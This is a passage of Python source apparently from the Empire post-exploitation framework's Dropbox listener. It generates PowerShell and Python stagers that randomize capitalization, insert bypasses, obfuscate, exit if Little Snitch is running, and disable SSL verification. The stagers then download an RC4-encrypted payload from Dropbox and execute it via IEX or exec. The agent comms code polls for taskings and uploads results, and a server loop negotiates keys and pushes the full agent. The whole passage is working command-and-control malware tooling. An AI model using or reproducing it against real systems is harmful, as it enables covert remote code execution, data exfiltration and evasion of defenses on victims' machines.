resultsFolder = "/%s/%s" % (baseFolder, listenerOptions['ResultsFolder']['Value'].strip('/'))
if language.startswith('po'):
# PowerShell
# replace with stager = '' for troubleshooting
stager = '$ErrorActionPreference = \"SilentlyContinue\";'
if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
for bypass in bypasses:
stager += bypass
stager += "};"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+"=New-Object System.Net.WebClient;")
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
stager += "$u='"+userAgent+"';"
if userAgent.lower() != 'none' or proxy.lower() != 'none':
if userAgent.lower() != 'none':
stager += helpers.randomize_capitalization('$'+helpers.generate_random_script_var_name("wc")+'.Headers.Add(')
stager += "'User-Agent',$u);"
if proxy.lower() != 'none':
if proxy.lower() == 'default':
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy=[System.Net.WebRequest]::DefaultWebProxy;")
else:
# TODO: implement form for other proxy
stager += helpers.randomize_capitalization("$proxy=New-Object Net.WebProxy;")
stager += helpers.randomize_capitalization("$proxy.Address = '"+ proxy.lower() +"';")
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy = $proxy;")
if proxyCreds.lower() == "default":
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;")
else:
# TODO: implement form for other proxy credentials
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
domain = username.split('\\')[0]
usr = username.split('\\')[1]
stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');"
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy.Credentials = $netcred;")
#save the proxy settings to use during the entire staging process and the agent
stager += "$Script:Proxy = $"+helpers.generate_random_script_var_name("wc")+".Proxy;"
# TODO: reimplement stager retries?
# code to turn the key string into a byte array
stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
stager += "'%s');" % (stagingKey)
# this is the minimized RC4 stager code from rc4.ps1
stager += helpers.randomize_capitalization('$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
# add in the Dropbox auth token and API params
stager += "$t='%s';" % (apiToken)
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Headers.Add(")
stager += "\"Authorization\",\"Bearer $t\");"
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Headers.Add(")
stager += "\"Dropbox-API-Arg\",'{\"path\":\"%s/debugps\"}');" % (stagingFolder)
stager += helpers.randomize_capitalization("$data=$"+helpers.generate_random_script_var_name("wc")+".DownloadData('")
stager += "https://content.dropboxapi.com/2/files/download');"
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
# decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
if obfuscate:
stager = helpers.obfuscate(self.mainMenu.installPath, stager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(stager, launcher)
else:
# otherwise return the case-randomized stager
return stager
elif language.startswith('py'):
launcherBase = 'import sys;'
# monkey patch ssl woohooo
launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;\n"
try:
if safeChecks.lower() == 'true':
launcherBase += "import re, subprocess;"
launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n"
launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n"
launcherBase += "out, err = ps.communicate()\n"
launcherBase += "if re.search(\"Little Snitch\", out):\n"
launcherBase += " sys.exit()\n"
except Exception as e:
p = "[!] Error setting LittleSnitch in stager: " + str(e)
print(helpers.color(p, color='red'))
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
launcherBase += "import urllib.request;\n"
launcherBase += "UA='%s';" % (userAgent)
launcherBase += "t='%s';" % (apiToken)
launcherBase += "server='https://content.dropboxapi.com/2/files/download';"
launcherBase += "req=urllib.request.Request(server);\n"
launcherBase += "req.add_header('User-Agent',UA);\n"
launcherBase += "req.add_header(\"Authorization\",\"Bearer \"+t);"
launcherBase += "req.add_header(\"Dropbox-API-Arg\",'{\"path\":\"%s/debugpy\"}');\n" % (stagingFolder)
if proxy.lower() != "none":
if proxy.lower() == "default":
launcherBase += "proxy = urllib.request.ProxyHandler();\n"
else:
proto = proxy.Split(':')[0]
launcherBase += "proxy = urllib.request.ProxyHandler({'"+proto+"':'"+proxy+"'});\n"
if proxyCreds != "none":
if proxyCreds == "default":
launcherBase += "o = urllib.request.build_opener(proxy);\n"
else:
launcherBase += "proxy_auth_handler = urllib.request.ProxyBasicAuthHandler();\n"
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n"
launcherBase += "o = urllib.request.build_opener(proxy, proxy_auth_handler);\n"
else:
launcherBase += "o = urllib.request.build_opener(proxy);\n"
else:
launcherBase += "o = urllib.request.build_opener();\n"
#install proxy and creds globally, so they can be used with urlopen.
launcherBase += "urllib.request.install_opener(o);\n"
launcherBase += "a=urllib.request.urlopen(req).read();\n"
launcherBase += "IV=a[0:4];"
launcherBase += "data=a[4:];"
launcherBase += "key=IV+'%s';" % (stagingKey)
# RC4 decryption
launcherBase += "S,j,out=list(range(256)),0,[]\n"
launcherBase += "for i in list(range(256)):\n"
launcherBase += " j=(j+S[i]+key[i%len(key)])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += "i=j=0\n"
launcherBase += "for char in data:\n"
launcherBase += " i=(i+1)%256\n"
launcherBase += " j=(j+S[i])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += " out.append(chr(char^S[(S[i]+S[j])%256]))\n"
launcherBase += "exec(''.join(out))"
if encode:
launchEncoded = base64.b64encode(launcherBase.encode('UTF-8')).decode('UTF-8')
launcher = "echo \"import sys,base64;exec(base64.b64decode('%s'));\" | python3 &" % (launchEncoded)
return launcher
else:
return launcherBase
else:
print(helpers.color("[!] listeners/dbx generate_launcher(): invalid listener name specification!"))
def generate_stager(self, listenerOptions, encode=False, encrypt=True, language=None):
"""
Generate the stager code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/dbx generate_stager(): no language specified!'))
return None
pollInterval = listenerOptions['PollInterval']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
baseFolder = listenerOptions['BaseFolder']['Value'].strip('/')
apiToken = listenerOptions['APIToken']['Value']
profile = listenerOptions['DefaultProfile']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
stagingFolder = "/%s/%s" % (baseFolder, listenerOptions['StagingFolder']['Value'].strip('/'))
if language.lower() == 'powershell':
# read in the stager base
with open("%s/data/agent/stagers/dropbox.ps1" % (self.mainMenu.installPath)) as f:
stager = f.read()
# patch the server and key information
stager = stager.replace('REPLACE_STAGING_FOLDER', stagingFolder)
stager = stager.replace('REPLACE_STAGING_KEY', stagingKey)
stager = stager.replace('REPLACE_POLLING_INTERVAL', pollInterval)
#patch in working hours, if any
if workingHours != "":
stager = stager.replace('WORKING_HOURS_REPLACE', workingHours)
randomizedStager = ''
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
else:
randomizedStager += line
# base64 encode the stager and return it
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV+stagingKey.encode('UTF-8'), randomizedStager.encode('UTF-8'))
else:
# otherwise just return the case-randomized stager
return randomizedStager
elif language.lower() == 'python':
template_path = [
os.path.join(self.mainMenu.installPath, '/data/agent/stagers'),
os.path.join(self.mainMenu.installPath, './data/agent/stagers')]
eng = templating.TemplateEngine(template_path)
template = eng.get_template('dropbox.py')
template_options = {
'staging_folder': stagingFolder,
'poll_interval': pollInterval,
'staging_key': stagingKey,
'profile': profile,
'api_token': apiToken
}
stager = template.render(template_options)
if encode:
return base64.b64encode(stager)
if encrypt:
# return an encrypted version of the stager ("normal" staging)
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV+stagingKey.encode('UTF-8'), stager.encode('UTF-8'))
else:
# otherwise return the standard stager
return stager
else:
print(helpers.color("[!] listeners/http generate_stager(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."))
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand="", version=''):
"""
Generate the full agent code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/dbx generate_agent(): no language specified!'))
return None
language = language.lower()
delay = listenerOptions['DefaultDelay']['Value']
jitter = listenerOptions['DefaultJitter']['Value']
profile = listenerOptions['DefaultProfile']['Value']
lostLimit = listenerOptions['DefaultLostLimit']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
killDate = listenerOptions['KillDate']['Value']
b64DefaultResponse = base64.b64encode(self.default_response().encode('UTF-8'))
if language == 'powershell':
with open(self.mainMenu.installPath + "/data/agent/agent.ps1") as f:
code = f.read()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace('$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', "$Profile = \"" + str(profile) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "'+b64DefaultResponse.decode('UTF-8')+'"')
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
return code
elif language == 'python':
if version == 'ironpython':
f = open(self.mainMenu.installPath + "/data/agent/ironpython_agent.py")
else:
f = open(self.mainMenu.installPath + "/data/agent/agent.py")
code = f.read()
f.close()
#path in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
#strip out comments and blank lines
code = helpers.strip_python_comments(code)
#patch some more
code = code.replace('delay = 60', 'delay = %s' % (delay))
code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter))
code = code.replace('profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', 'profile = "%s"' % (profile))
code = code.replace('lostLimit = 60', 'lostLimit = %s' % (lostLimit))
code = code.replace('defaultResponse = base64.b64decode("")', 'defaultResponse = base64.b64decode("%s")' % (b64DefaultResponse.decode('UTF-8')))
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('killDate = ""', 'killDate = "%s"' % (killDate))
if workingHours != "":
code = code.replace('workingHours = ""', 'workingHours = "%s"' % (killDate))
return code
else:
print(helpers.color("[!] listeners/dbx generate_agent(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."))
def generate_comms(self, listenerOptions, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
"""
stagingKey = listenerOptions['StagingKey']['Value']
pollInterval = listenerOptions['PollInterval']['Value']
apiToken = listenerOptions['APIToken']['Value']
baseFolder = listenerOptions['BaseFolder']['Value'].strip('/')
taskingsFolder = "/%s/%s" % (baseFolder, listenerOptions['TaskingsFolder']['Value'].strip('/'))
resultsFolder = "/%s/%s" % (baseFolder, listenerOptions['ResultsFolder']['Value'].strip('/'))
if language:
if language.lower() == 'powershell':
updateServers = """
$Script:APIToken = "%s";
""" % (apiToken)
getTask = """
$script:GetTask = {
try {
# build the web request object
$"""+helpers.generate_random_script_var_name("wc")+""" = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$"""+helpers.generate_random_script_var_name("wc")+""".Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$"""+helpers.generate_random_script_var_name("wc")+""".Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$"""+helpers.generate_random_script_var_name("wc")+""".Proxy = $Script:Proxy;
}
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add("User-Agent", $script:UserAgent)
$Script:Headers.GetEnumerator() | ForEach-Object {$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add($_.Name, $_.Value)}
$TaskingsFolder = '"""+ taskingsFolder +"""'
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Set("Authorization", "Bearer $($Script:APIToken)")
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Set("Dropbox-API-Arg", "{`"path`":`"$TaskingsFolder/$($script:SessionID).txt`"}")
$Data = $"""+helpers.generate_random_script_var_name("wc")+""".DownloadData("https://content.dropboxapi.com/2/files/download")
if($Data -and ($Data.Length -ne 0)) {
# if there was a tasking data, remove it
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add("Content-Type", " application/json")
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Remove("Dropbox-API-Arg")
$Null=$"""+helpers.generate_random_script_var_name("wc")+""".UploadString("https://api.dropboxapi.com/2/files/delete", "POST", "{`"path`":`"$TaskingsFolder/$($script:SessionID).txt`"}")
$Data
}
$script:MissedCheckins = 0
}
catch {
if ($_ -match 'Unable to connect') {
$script:MissedCheckins += 1
}
}
}
"""
sendMessage = """
$script:SendMessage = {
param($Packets)
if($Packets) {
# build and encrypt the response packet
$EncBytes = Encrypt-Bytes $Packets
# build the top level RC4 "routing packet"
# meta 'RESULT_POST' : 5
$RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5
# build the web request object
$"""+helpers.generate_random_script_var_name("wc")+""" = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$"""+helpers.generate_random_script_var_name("wc")+""".Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$"""+helpers.generate_random_script_var_name("wc")+""".Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$"""+helpers.generate_random_script_var_name("wc")+""".Proxy = $Script:Proxy;
}
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add('User-Agent', $Script:UserAgent)
$Script:Headers.GetEnumerator() | ForEach-Object {$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add($_.Name, $_.Value)}
$ResultsFolder = '"""+ resultsFolder +"""'
try {
# check if the results file is still in the specified location, if so then
# download the file and append the new routing packet to it
try {
$Data = $Null
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Set("Authorization", "Bearer $($Script:APIToken)");
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Set("Dropbox-API-Arg", "{`"path`":`"$ResultsFolder/$($script:SessionID).txt`"}");
$Data = $"""+helpers.generate_random_script_var_name("wc")+""".DownloadData("https://content.dropboxapi.com/2/files/download")
}
catch { }
if($Data -and $Data.Length -ne 0) {
$RoutingPacket = $Data + $RoutingPacket
}
$"""+helpers.generate_random_script_var_name("wc")+"""2 = New-Object System.Net.WebClient
$"""+helpers.generate_random_script_var_name("wc")+"""2.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$"""+helpers.generate_random_script_var_name("wc")+"""2.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$"""+helpers.generate_random_script_var_name("wc")+"""2.Proxy = $Script:Proxy;
}
$"""+helpers.generate_random_script_var_name("wc")+"""2.Headers.Add("Authorization", "Bearer $($Script:APIToken)")
$"""+helpers.generate_random_script_var_name("wc")+"""2.Headers.Add("Content-Type", "application/octet-stream")
$"""+helpers.generate_random_script_var_name("wc")+"""2.Headers.Add("Dropbox-API-Arg", "{`"path`":`"$ResultsFolder/$($script:SessionID).txt`"}");
$Null = $"""+helpers.generate_random_script_var_name("wc")+"""2.UploadData("https://content.dropboxapi.com/2/files/upload", "POST", $RoutingPacket)
$script:MissedCheckins = 0
}
catch {
if ($_ -match 'Unable to connect') {
$script:MissedCheckins += 1
}
}
}
}
"""
return updateServers + getTask + sendMessage
elif language.lower() == 'python':
sendMessage = """
def send_message(packets=None):
# Requests a tasking or posts data to a randomized tasking URI.
# If packets == None, the agent GETs a tasking from the control server.
# If packets != None, the agent encrypts the passed packets and
# POSTs the data to the control server.
def post_message(uri, data, headers):
req = urllib.request.urlopen(uri)
headers['Authorization'] = "Bearer REPLACE_API_TOKEN"
for key, value in headers.items():
req.add_header("%s"%(key),"%s"%(value))
if data:
req.add_data(data)
o=urllib.request.build_opener()
o.add_handler(urllib.request.ProxyHandler(urllib.request.getproxies()))
urllib.request.install_opener(o)
return urllib.request.urlopen(req).read()
global missedCheckins
global headers
taskingsFolder="REPLACE_TASKSING_FOLDER"
resultsFolder="REPLACE_RESULTS_FOLDER"
data = None
requestUri=''
try:
del headers['Content-Type']
except:
pass
if packets:
# aes_encrypt_then_hmac is in stager.py
encData = aes_encrypt_then_hmac(key, packets)
data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData)
#check to see if there are any results already present
headers['Dropbox-API-Arg'] = "{\\"path\\":\\"%s/%s.txt\\"}" % (resultsFolder, sessionID)
try:
pkdata = post_message('https://content.dropboxapi.com/2/files/download', data=None, headers=headers)
except:
pkdata = None
if pkdata and len(pkdata) > 0:
data = pkdata + data
headers['Content-Type'] = "application/octet-stream"
requestUri = 'https://content.dropboxapi.com/2/files/upload'
else:
headers['Dropbox-API-Arg'] = "{\\"path\\":\\"%s/%s.txt\\"}" % (taskingsFolder, sessionID)
requestUri='https://content.dropboxapi.com/2/files/download'
try:
resultdata = post_message(requestUri, data, headers)
if (resultdata and len(resultdata) > 0) and requestUri.endswith('download'):
headers['Content-Type'] = "application/json"
del headers['Dropbox-API-Arg']
datastring="{\\"path\\":\\"%s/%s.txt\\"}" % (taskingsFolder, sessionID)
nothing = post_message('https://api.dropboxapi.com/2/files/delete', datastring, headers)
return ('200', resultdata)
except urllib.request.HTTPError as HTTPError:
# if the server is reached, but returns an erro (like 404)
return (HTTPError.code, '')
except urllib.request.URLError as URLerror:
# if the server cannot be reached
missedCheckins = missedCheckins + 1
return (URLerror.reason, '')
return ('', '')
"""
sendMessage = sendMessage.replace('REPLACE_TASKSING_FOLDER', taskingsFolder)
sendMessage = sendMessage.replace('REPLACE_RESULTS_FOLDER', resultsFolder)
sendMessage = sendMessage.replace('REPLACE_API_TOKEN', apiToken)
return sendMessage
else:
print(helpers.color('[!] listeners/dbx generate_comms(): no language specified!'))
def start_server(self, listenerOptions):
"""
Threaded function that actually starts up polling server for Dropbox
polling communication.
./Empire/
./staging/
stager.ps1
SESSION_[1-4].txt
./taskings/
SESSIONID.txt
./results/
SESSIONID.txt
/Empire/staging/stager.ps1 -> RC4staging(stager.ps1) uploaded by server
/Empire/staging/sessionID_1.txt -> AESstaging(PublicKey) uploaded by client
/Empire/staging/sessionID_2.txt -> RSA(nonce+AESsession) uploaded by server
/Empire/staging/sessionID_3.txt -> AESsession(nonce+sysinfo) uploaded by client
/Empire/staging/sessionID_4.txt -> AESsession(agent.ps1) uploaded by server
client dropbox server
<- upload /Empire/staging/stager.ps1
read /Empire/staging/stager ->
<- return stager
generate sessionID
upload /Empire/staging/sessionID_1.txt ->
<- read /Empire/staging/sessionID_1.txt
<- upload /Empire/staging/sessionID_2.txt
read /Empire/staging/sessionID_2.txt ->
<- /Empire/staging/sessionID_2.txt
upload /Empire/staging/sessionID_3.txt ->
<- read /Empire/staging/sessionID_3.txt
<- upload /Empire/staging/sessionID_4.txt
read /Empire/staging/sessionID_4.txt ->
<- /Empire/staging/sessionID_4.txt
<start beaconing>
<- upload /Empire/taskings/sessionID.txt
read /Empire/taskings/sessionID.txt ->
<- /Empire/taskings/sessionID.txt
delete /Empire/taskings/sessionID.txt ->
execute code
upload /Empire/results/sessionID.txt ->
<- read /Empire/results/sessionID.txt
<- delete /Empire/results/sessionID.txt
"""
def download_file(dbx, path):
# helper to download a file at the given path
try:
md, res = dbx.files_download(path)
except dropbox.exceptions.HttpError as err:
listenerName = self.options['Name']['Value']
message = "[!] Error downloading data from '{}' : {}".format(path, err)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
return None
return res.content
def upload_file(dbx, path, data):
# helper to upload a file to the given path
try:
dbx.files_upload(data, path)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[!] Error uploading data to '{}'".format(path)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
def delete_file(dbx, path):
# helper to delete a file at the given path
try:
dbx.files_delete(path)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[!] Error deleting data at '{}'".format(path)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
# make a copy of the currently set listener options for later stager/agent generation
listenerOptions = copy.deepcopy(listenerOptions)
stagingKey = listenerOptions['StagingKey']['Value']
pollInterval = listenerOptions['PollInterval']['Value']
apiToken = listenerOptions['APIToken']['Value']
listenerName = listenerOptions['Name']['Value']
baseFolder = listenerOptions['BaseFolder']['Value'].strip('/')
stagingFolder = "/%s/%s" % (baseFolder, listenerOptions['StagingFolder']['Value'].strip('/'))
taskingsFolder = "/%s/%s" % (baseFolder, listenerOptions['TaskingsFolder']['Value'].strip('/'))
resultsFolder = "/%s/%s" % (baseFolder, listenerOptions['ResultsFolder']['Value'].strip('/'))
dbx = dropbox.Dropbox(apiToken)
# ensure that the access token supplied is valid
try:
dbx.users_get_current_account()
except dropbox.exceptions.AuthError as err:
print(helpers.color("[!] ERROR: Invalid access token; try re-generating an access token from the app console on the web."))
return False
# setup the base folder structure we need
try:
dbx.files_create_folder(stagingFolder)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[*] Dropbox folder '{}' already exists".format(stagingFolder)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
try:
dbx.files_create_folder(taskingsFolder)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[*] Dropbox folder '{}' already exists".format(taskingsFolder)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
try:
dbx.files_create_folder(resultsFolder)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[*] Dropbox folder '{}' already exists".format(resultsFolder)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
# upload the stager.ps1 code
stagerCodeps = self.generate_stager(listenerOptions=listenerOptions, language='powershell')
stagerCodepy = self.generate_stager(listenerOptions=listenerOptions, language='python')
try:
# delete stager if it exists
delete_file(dbx, "%s/debugps" % (stagingFolder))
delete_file(dbx, "%s/debugpy" % (stagingFolder))
dbx.files_upload(stagerCodeps, "%s/debugps" % (stagingFolder))
dbx.files_upload(stagerCodepy, "%s/debugpy" % (stagingFolder))
except dropbox.exceptions.ApiError:
print(helpers.color("[!] Error uploading stager to '%s/stager'" % (stagingFolder)))
return
while True:
time.sleep(int(pollInterval))
# search for anything in /Empire/staging/*
for match in dbx.files_search(stagingFolder, "*.txt").matches:
fileName = str(match.metadata.path_display)
relName = fileName.split('/')[-1][:-4]
sessionID, stage = relName.split('_')
sessionID = sessionID.upper()
if '_' in relName:
if stage == '1':
try:
md, res = dbx.files_download(fileName)
except dropbox.exceptions.HttpError as err:
listenerName = self.options['Name']['Value']
message = "[!] Error downloading data from '{}' : {}".format(fileName, err)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
continue
stageData = res.content
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, stageData, listenerOptions)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
# TODO: more error checking
try:
dbx.files_delete(fileName)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[!] Error deleting data at '{}'".format(fileName)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
try:
stageName = "%s/%s_2.txt" % (stagingFolder, sessionID)
listenerName = self.options['Name']['Value']
message = "[*] Uploading key negotiation part 2 to {} for {}".format(stageName, sessionID)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
dbx.files_upload(results, stageName)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[!] Error uploading data to '{}'".format(stageName)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
if stage == '3':
try:
md, res = dbx.files_download(fileName)
except dropbox.exceptions.HttpError as err:
listenerName = self.options['Name']['Value']
message = "[!] Error downloading data from '{}' : {}".format(fileName, err)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
continue
stageData = res.content
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, stageData, listenerOptions)
if dataResults and len(dataResults) > 0:
# print "dataResults:",dataResults
for (language, results) in dataResults:
if results.startswith('STAGE2'):
sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
listenerName = self.options['Name']['Value']
message = "[*] Sending agent (stage 2) to {} through Dropbox".format(sessionID)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
try:
dbx.files_delete(fileName)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[!] Error deleting data at '{}'".format(fileName)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
try:
fileName2 = fileName.replace("%s_3.txt" % (sessionID), "%s_2.txt" % (sessionID))
dbx.files_delete(fileName2)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[!] Error deleting data at '{}'".format(fileName2)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
session_info = Session().query(models.Agent).filter(
models.Agent.session_id == sessionID).first()
if session_info.language == 'ironpython':
version = 'ironpython'
else:
version = ''
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
agentCode = self.generate_agent(language=language, listenerOptions=listenerOptions,
version=version)
returnResults = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
try:
stageName = "%s/%s_4.txt" % (stagingFolder, sessionID)
listenerName = self.options['Name']['Value']
message = "[*] Uploading key negotiation part 4 (agent) to {} for {}".format(stageName, sessionID)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
dbx.files_upload(returnResults, stageName)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[!] Error uploading data to '{}'".format(stageName)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
# get any taskings applicable for agents linked to this listener
sessionIDs = self.mainMenu.agents.get_agents_for_listener(listenerName)
for x in range(len(sessionIDs)):
if isinstance(sessionIDs[x], bytes):
sessionIDs[x] = sessionIDs[x].decode('UTF-8')
for sessionID in sessionIDs:
taskingData = self.mainMenu.agents.handle_agent_request(sessionID, 'powershell', stagingKey)
if taskingData:
try:
taskingFile = "%s/%s.txt" % (taskingsFolder, sessionID)
# if the tasking file still exists, download/append + upload again
existingData = None
try:
md, res = dbx.files_download(taskingFile)
existingData = res.content
except:
existingData = None
if existingData:
taskingData = taskingData + existingData
listenerName = self.options['Name']['Value']
message = "[*] Uploading agent tasks for {} to {}".format(sessionID, taskingFile)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
dbx.files_upload(taskingData, taskingFile, mode=dropbox.files.WriteMode.overwrite)
except dropbox.exceptions.ApiError as e:
listenerName = self.options['Name']['Value']
message = "[!] Error uploading agent tasks for {} to {} : {}".format(sessionID, taskingFile, e)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
# check for any results returned
for match in dbx.files_search(resultsFolder, "*.txt").matches:
fileName = str(match.metadata.path_display)
sessionID = fileName.split('/')[-1][:-4]
listenerName = self.options['Name']['Value']
message = "[*] Downloading data for '{}' from {}".format(sessionID, fileName)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
try:
md, res = dbx.files_download(fileName)
except dropbox.exceptions.HttpError as err:
listenerName = self.options['Name']['Value']
